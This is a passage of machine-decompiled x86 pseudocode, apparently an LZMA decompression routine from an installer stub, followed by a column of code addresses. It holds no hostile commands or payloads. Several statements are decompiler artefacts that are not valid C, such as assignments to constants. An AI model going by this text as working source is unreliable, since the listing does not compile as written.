											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                0x00000000
                                                0x00406c2e
                                                0x00406c2e
                                                0x00406c32
                                                0x00406c5b
                                                0x00406c65
                                                0x00406c34
                                                0x00406c3d
                                                0x00406c4a
                                                0x00406c4d
                                                0x00406f91
                                                0x00406f91
                                                0x00406f94
                                                0x00406f94
                                                0x00406f94
                                                0x00406f9a
                                                0x00406fa0
                                                0x00406fa6
                                                0x00406fc0
                                                0x00406fc3
                                                0x00406fc9
                                                0x00406fd4
                                                0x00406fd6
                                                0x00406fa8
                                                0x00406fa8
                                                0x00406fb7
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fe0
                                                0x00000000
